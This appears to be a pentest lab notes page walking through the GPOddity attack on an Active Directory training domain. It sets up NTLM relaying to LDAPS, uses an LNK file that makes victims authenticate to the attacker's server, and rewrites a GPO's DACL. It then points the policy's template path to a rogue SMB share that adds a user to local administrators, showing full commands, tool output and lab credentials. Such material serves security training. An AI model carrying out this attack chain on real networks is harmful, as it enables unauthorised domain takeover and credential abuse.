GPOddity
GPOddity combines NTLM relaying with the modification of a GPO:
The target user has
WriteDACLover a GPORelay credentials of the target user for modifying the path of the GP template (
gPCFileSysPath)Load a malicious template from an attacker-controlled location
The target user has WriteDACL over a GPO:
# Get GPO's details with PowerView
> Get-DomainGPO -identity "DevOps Policy"
displayname : DevOps Policy
name : {0BF8D01C-1F62-4BDC-958C-57140B67D147}
cn : {0BF8D01C-1F62-4BDC-958C-57140B67D147}
objectguid : fc0df125-5e26-4794-93c7-e60c6eecb75f
gpcfilesyspath : \\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{0BF8D01C-1F62-4BDC-958C-57140B67D147}
distinguishedname : CN={0BF8D01C-1F62-4BDC-958C-57140B67D147},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=localRelay the LDAP service on the DC (172.16.2.1) to the attack's machine (172.160.100.37):
sudo impacket-ntlmrelayx -t ldaps://172.16.2.1 -wh 172.16.100.37 --http-port "80,8080" -i -no-smb-serverCreate a shortcut pointing to the attacker's relay server:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Invoke-WebRequest -Uri 'http://172.16.100.37' -UseDefaultCredentials"Copy the .LNK file to the target share:
> xcopy .\student337.lnk \\dcorp-ci\AI
.\student337.lnk
1 File(s) copiedBack on the relay server:
[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Connection from 172.16.3.11 controlled, attacking target ldaps://172.16.2.1
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Authenticating against ldaps://172.16.2.1 as DCORP/DEVOPSADMIN SUCCEED
[*] Started interactive Ldap shell via TCP on 127.0.0.1:11000 as DCORP/DEVOPSADMINAssign the WriteDACL permissions over the target GPO on the attacker (domain user):
$ nc 127.0.0.1 11000
Type help for list of commands
# whoami
u:dcorp\devopsadmin
# write_gpo_dacl student337 {0BF8D01C-1F62-4BDC-958C-57140B67D147}
Adding student337 to GPO with GUID {0BF8D01C-1F62-4BDC-958C-57140B67D147}
LDAP server claims to have taken the secdescriptor. Have funAlternatively, if we don't have compromised a domain user, we can add a computer object and assign the permissions to it:
# add_computer std337-gpattack Secretpass@123
Attempting to add a new computer with the name: std337-gpattack$
Inferred Domain DN: DC=dollarcorp,DC=moneycorp,DC=local
Inferred Domain Name: dollarcorp.moneycorp.local
New Computer DN: CN=std337-gpattack,CN=Computers,DC=dollarcorp,DC=moneycorp,DC=local
Adding new computer with username: std337-gpattack$ and password:
Secretpass@123 result: OK
# write_gpo_dacl std337-gpattack$ {0BF8D01C-1F62-4BDC-958C-57140B67D147}
Adding std337-gpattack$ to GPO with GUID {0BF8D01C-1F62-4BDC-958C-57140B67D147}
LDAP server claims to have taken the secdescriptor. Have funExecute the GPOddity attack:
# Create & inject a malicious template
sudo python3 gpoddity.py --gpo-id '0BF8D01C-1F62-4BDC-958C-57140B67D147' --domain
'dollarcorp.moneycorp.local' --username 'student337' --password 'nUQfN3A8CcV7GxqT' --command 'net localgroup administrators student337 /add' --rogue-smbserver-ip '172.16.100.37' --rogue-smbserver-share 'std337-gp' --dc-ip '172.16.2.1' --smb-mode noneCreate the share and move the malicious template to it:
# Create the share
mkdir /mnt/c/AD/Tools/std337-gp
# Move the template to the share
cp -r /mnt/c/AD/Tools/GPOddity/GPT_out/* /mnt/c/AD/Tools/std337-gp/From a SYSTEM shell point configure the share's path and permissions:
# Configure the share path
C:\Windows\system32>net share std337-gp=c:\AD\Tools\std337-gp
std337-gp was shared successfully.
# Provide full control to everyone
C:\Windows\system32>icacls "C:\AD\Tools\std337-gp" /grant Everyone:F /TCheck the policy's attribute with PowerView:
> Get-DomainGPO -identity "DevOps Policy" | select gpcfilesyspath
gpcfilesyspath
--------------
\\172.16.100.37\std337-gpWhen the policy refreshes:
# Check admin access with PowerView
> Find-LocalAdminAccess
dcorp-adminsrv.dollarcorp.moneycorp.local
dcorp-ci.dollarcorp.moneycorp.local
dcorp-std337.dollarcorp.moneycorp.localLast updated
Was this helpful?